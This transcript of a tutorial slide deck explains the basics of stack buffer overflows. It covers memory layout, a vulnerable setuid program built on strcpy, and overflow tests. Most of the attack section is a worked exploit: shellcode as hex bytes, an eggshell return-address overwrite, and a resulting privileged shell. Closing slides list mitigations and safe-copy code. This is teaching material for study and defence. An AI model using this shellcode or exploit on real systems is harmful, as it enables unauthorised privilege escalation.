basic of buffer over flow


Upload: korene

Post on 21-Jan-2016


TRANSCRIPT

Page 1: Basic of Buffer Over Flow

Basic of Buffer Over Flow

S.S.G 방승원

Page 2: Basic of Buffer Over Flow

Agenda

• Introduction
• Memory Structure
• Stack Structure while Example
• Target Program
• Ready & Attack
• Attack & Security
• Application of Overflow

Page 3: Basic of Buffer Over Flow

Introduction

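• Overflow ??
– To overflow, to spill over; to flood
– (of a container) to be filled to the brim, to overflow

• Buffer Over Flow ??
– An attack that takes in more data than the allotted memory and overwrites a specific region, changing the program flow so that code chosen by the attacker is executed
– <Phrack Magazine 49-14>, Aleph One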

Page 4: Basic of Buffer Over Flow

Memory Structure

• TEXT : Program Code
• DATA : Static Variable, Global Variable
• HEAP : Dynamic Allocation
• STACK : Dynamic Variable, Local Variable

[Diagram: memory layout from LOW to HIGH address: TEXT, DATA, HEAP, STACK]

Page 5: Basic of Buffer Over Flow

Stack Structure

• LIFO(Last In First Out)

• PUSH

• POP

• SP(Stack Pointer)

• BP(Base Pointer)

[Diagram: STACK, between Memory LOW (0x08048000) and Memory HIGH (0xbfffffff); labels: Stack HIGH, Stack LOW, PUSH, POP, BP, SP]

Page 6: Basic of Buffer Over Flow

Example Program

#include <stdio.h>

void func(int a, int b, int c)
{
    /* locals allocated in func's stack frame */
    int buf1;
    char buf2[16];
}

int main(void)
{
    func(1, 2, 3);
    printf("Hello, World!\n");
    return 0;
}

Page 7: Basic of Buffer Over Flow

Example Program


[Diagram: STACK, between Memory LOW (0x08048000) and Memory HIGH (0xbfffffff); labels: Stack HIGH, Stack LOW, EBP, ESP]

Page 8: Basic of Buffer Over Flow

Example Program

main:
    pushl $3
    pushl $2
    pushl $1
    call func
    addl $16, %esp

func:
    pushl %ebp
    movl %esp, %ebp
    subl $40, %esp
    leave    (pop %ebp)
    ret

[Diagram: STACK, between Memory LOW (0x08048000) and Memory HIGH (0xbfffffff); labels: Stack HIGH, Stack LOW, EBP, ESP]

Page 9: Basic of Buffer Over Flow

Target Program

#include <stdio.h>
#include <string.h>

void func(char *str)
{
    char buf[64];
    strcpy(buf, str);    /* no length check: the overflow these slides demonstrate */
}

int main(int argc, char *argv[])
{
    func(argv[1]);
    printf("Hello, World\n");
    return 0;
}

• argc, argv
How a program receives its arguments when it is run
ex) ./target bang 1234
argc = 3;
argv[0] = "target";
argv[1] = "bang";
argv[2] = "1234";

• strcpy(dest, src)
Copies the string pointed to by src into dest
* There is no size limit, so an overflow vulnerability arises

Page 10: Basic of Buffer Over Flow

Target Program

• The Setuid Bit is set
Set User ID Bit (number – 4000)

$ chmod 4755 target (or chmod u+s)
-rwsr-xr-x 1 level1 level1 target

Any user who runs this target gets the privileges of the level1 user
ex) passwd

• Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5

Page 11: Basic of Buffer Over Flow

Target Program

• Let’s Run program With a lot of ‘A’ Character!!!

• Result : Segmentation Fault

• Why??

Page 12: Basic of Buffer Over Flow

Target Program


[Diagram: STACK, between Memory LOW (0x08048000) and Memory HIGH (0xbfffffff); labels: Stack HIGH, Stack LOW, EBP, ESP]

Page 13: Basic of Buffer Over Flow

Target Program

[Diagram: STACK; labels: Memory LOW, Memory HIGH, Stack HIGH, Stack LOW]

$ ./target `perl -e 'print "A"x71'`

[ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes

Normal

Page 14: Basic of Buffer Over Flow

Target Program

[Diagram: STACK; labels: Memory LOW, Memory HIGH, Stack HIGH, Stack LOW]

$ ./target `perl -e 'print "A"x72'`

[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes

Overflow

Page 15: Basic of Buffer Over Flow

Target Program

[Diagram: STACK; labels: Memory LOW, Memory HIGH, Stack HIGH, Stack LOW]

$ ./target `perl -e 'print "A"x80'`

[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ]
64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes

Real Overflow

Page 16: Basic of Buffer Over Flow

Target Program

func:
    pushl %ebp
    movl %esp, %ebp
    subl $72, %esp
    subl $8, %esp
    pushl 8(%ebp)
    leal -72(%ebp), %eax
    pushl %eax
    call strcpy
    addl $16, %esp
    leave
    ret
main:
    movl 12(%ebp), %eax
    addl $4, %eax
    pushl (%eax)
    call func
    addl $16, %esp
    subl $12, %esp

[Diagram: STACK, between Memory LOW (0x08048000) and Memory HIGH (0xbfffffff); labels: Stack HIGH, Stack LOW, EBP, ESP]

Page 17: Basic of Buffer Over Flow

Target Program

[Diagram: STACK, between Memory LOW (0x08048000) and Memory HIGH (0xbfffffff); labels: Stack HIGH, Stack LOW, EBP, ESP, 0x41414141(??)]

Page 18: Basic of Buffer Over Flow

Shell Code

• Code that executes a shell

#include <unistd.h>

int main(void)
{
    char *shell[2];

    setreuid(3001, 3001);
    shell[0] = "/bin/sh";
    shell[1] = NULL;

    execve(shell[0], shell, NULL);
    return 0;
}

Assembly code

"\x31\xc0\x31\xdb\x31\xc9\x66\xbb”“\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46”“\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88””\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3””\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31””\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Page 19: Basic of Buffer Over Flow

Attack Ready

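• Confirm the Segmentation Fault
• Write the shellcode
• When the shellcode is placed in the buffer, the address of that buffer has to be found
• But the address of the buffer is hard to guess
• So use Eggshell, which puts the shellcode into a shell environment variable and calculates the address of the shellcode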

Page 20: Basic of Buffer Over Flow

Attack

bash-2.05b$ ./egg 512 200
Using address: 0xbffffa60
bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")`
sh-2.05b$ id
uid=3001(level1) gid=1000(guest) groups=1000(guest)
sh-2.05b$

Page 21: Basic of Buffer Over Flow

Attack V.S Security

• Non-executable Stack
– Return Into Libc
– Omega Project
• Stack Guard and Stack Shield
– Bypass Stack Guard and Stack Shield
• Random Stacks
• Exec Shield (kernel level)
– Exec Shield bypass
• Refrain from using strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf(), etc. -> use strncpy(), strncat()
• And so on………
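A defensive counterpart to the Target Program's func() and to the strncpy() advice above, added here as an example that is not part of the original slides. The names copy_checked, copy_truncating and BUF_SIZE are chosen for this example; it shows a copy that rejects oversized input and the explicit termination that strncpy() needs.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same size as buf[] in the slides' func() */

/* Reject-on-overflow copy: 0 on success, -1 if str (plus NUL) does not fit. */
int copy_checked(char *dst, size_t dst_size, const char *str)
{
    size_t len = 0;

    if (dst == NULL || str == NULL || dst_size == 0)
        return -1;
    while (len < dst_size && str[len] != '\0')  /* never scan past dst_size */
        len++;
    if (len == dst_size)                        /* no room left for the NUL */
        return -1;
    memcpy(dst, str, len + 1);
    return 0;
}

/* strncpy() variant: strncpy() writes no NUL when str has dst_size - 1
 * or more bytes, so terminate explicitly.
 * Returns 1 if the input was truncated, 0 if it fit, -1 on bad arguments. */
int copy_truncating(char *dst, size_t dst_size, const char *str)
{
    if (dst == NULL || str == NULL || dst_size == 0)
        return -1;
    strncpy(dst, str, dst_size - 1);
    dst[dst_size - 1] = '\0';
    return strlen(str) >= dst_size;
}

int main(int argc, char *argv[])
{
    char buf[BUF_SIZE];

    if (argc < 2) {                 /* argv[1] is NULL without an argument */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (copy_checked(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "input longer than %d bytes, refusing\n", BUF_SIZE - 1);
        return 1;
    }
    printf("Hello, World\n");
    return 0;
}
```

Silent truncation can itself change program behaviour, so the rejecting variant is the safer default when the caller can report an error.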

Page 22: Basic of Buffer Over Flow

Application of Overflow

• Windows, Unix, Linux, Mac
• Local, Remote
• Web -> ActiveX
• Heap Overflow
• Integer Overflow
• Frame Pointer Overwrite